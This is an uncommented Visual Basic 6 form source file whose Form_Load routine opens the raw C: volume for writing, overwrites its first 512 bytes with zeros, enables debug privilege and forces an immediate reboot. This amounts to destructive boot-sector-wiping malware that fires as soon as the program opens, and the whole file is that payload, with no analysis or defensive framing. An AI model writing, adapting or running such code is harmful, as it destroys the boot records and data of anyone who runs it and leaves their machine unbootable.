Option Explicit
Private Const SE_SHUTDOWN_NAME As String = "SeShutdownPrivilege"
Private Const SE_DEBUG_NAME = "SeDebugPrivilege"
Private Const ERROR_NOT_ALL_ASSIGNED As Long = 1300&
Private Const EWX_FORCE As Long = 4
Private Const EWX_REBOOT As Long = 2
Private Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Private Const TOKEN_ASSIGN_PRIMARY As Long = &H1
Private Const TOKEN_DUPLICATE As Long = &H2
Private Const TOKEN_IMPERSONATE As Long = &H4
Private Const TOKEN_QUERY As Long = &H8
Private Const TOKEN_QUERY_SOURCE As Long = &H10
Private Const TOKEN_ADJUST_PRIVILEGES As Long = &H20
Private Const TOKEN_ADJUST_GROUPS As Long = &H40
Private Const TOKEN_ADJUST_SESSIONID As Long = &H100
Private Const TOKEN_ADJUST_DEFAULT As Long = &H80
Private Const TOKEN_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or TOKEN_ASSIGN_PRIMARY Or TOKEN_DUPLICATE Or TOKEN_IMPERSONATE Or TOKEN_QUERY Or TOKEN_QUERY_SOURCE Or TOKEN_ADJUST_PRIVILEGES Or TOKEN_ADJUST_GROUPS Or TOKEN_ADJUST_SESSIONID Or TOKEN_ADJUST_DEFAULT)
Private Const ANYSIZE_ARRAY As Long = 1
Private Const SYNCHRONIZE As Long = &H100000
Private Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
Private Const SE_PRIVILEGE_ENABLED As Long = &H2
Private Const GENERIC_WRITE As Long = &H40000000
Private Const FILE_SHARE_READ As Long = &H1
Private Const FILE_SHARE_WRITE As Long = &H2
Private Const OPEN_EXISTING As Long = 3
Private Type LARGE_INTEGER
LowPart As Long
HighPart As Long
End Type
Private Type LUID
LowPart As Long
HighPart As Long
End Type
Private Type LUID_AND_ATTRIBUTES
pLuid As LUID
Attributes As Long
End Type
Private Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type
Private Declare Function GetCurrentThread Lib "kernel32.dll" () As Long
Private Declare Function CreateFile Lib "kernel32.dll" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByRef lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Private Declare Function AdjustTokenPrivileges Lib "ADVAPI32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Private Declare Function OpenProcessToken Lib "ADVAPI32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "ADVAPI32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, ByRef lpLuid As LARGE_INTEGER) As Long
Private Declare Function ExitWindowsEx Lib "user32.dll" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function GetLastError Lib "kernel32.dll" () As Long
Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long
Dim lLUID As LUID
Dim TokenP As TOKEN_PRIVILEGES
Dim LuidAttrib As LUID_AND_ATTRIBUTES
Private sub Form_Load()
Dim pHnd, tHnd, ret, rBuffer, dHnd, ctHnd As Long
Dim rBufferLen, rlenWrite, n As Integer
Dim LuidCode As LARGE_INTEGER
Dim Buffer(511) As Byte
dHnd = CreateFile("\\.\C:", GENERIC_WRITE, FILE_SHARE_READ Or FILE_SHARE_WRITE, ByVal 0&, OPEN_EXISTING, ByVal 0&, ByVal 0&)
If dHnd = 0 Then GoTo done
For n = 0 To 511
Buffer(n) = 0
ret = WriteFile(dHnd, Buffer(n), Len(Buffer(n)), rBufferLen, ByVal 0&)
If rlenWrite = 0 Then GoTo done
Next
pHnd = OpenProcess(PROCESS_ALL_ACCESS, ByVal 0&, GetCurrentProcessId)
If pHnd = 0 Then
GoTo done
End If
ret = OpenProcessToken(pHnd, TOKEN_ALL_ACCESS, tHnd)
If ret = 0 Then
GoTo done
End If
ret = LookupPrivilegeValue(vbNullString, SE_DEBUG_NAME, LuidCode)
If ret = 0 Then
GoTo done
End If
lLUID.HighPart = LuidCode.HighPart
lLUID.LowPart = LuidCode.LowPart
LuidAttrib.pLuid.HighPart = lLUID.HighPart
LuidAttrib.pLuid.LowPart = lLUID.LowPart
TokenP.PrivilegeCount = 1
TokenP.Privileges(0) = LuidAttrib
TokenP.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
ret = AdjustTokenPrivileges(tHnd, 0, TokenP, ByVal 0&, TokenP, rBuffer)
If GetLastError = ERROR_NOT_ALL_ASSIGNED Then
GoTo done
End If
If GetLastError = 122 Then
ret = AdjustTokenPrivileges(tHnd, 0, TokenP, rBuffer, TokenP, rBuffer)
If ret = 0 Then
GoTo done
ElseIf ret = ERROR_NOT_ALL_ASSIGNED Then
GoTo done
End If
End If
ret = ExitWindowsEx(EWX_FORCE Or EWX_REBOOT, 0)
If ret = 0 Then
GoTo done
End If
done:
CloseHandle (pHnd)
CloseHandle (tHnd)
End Sub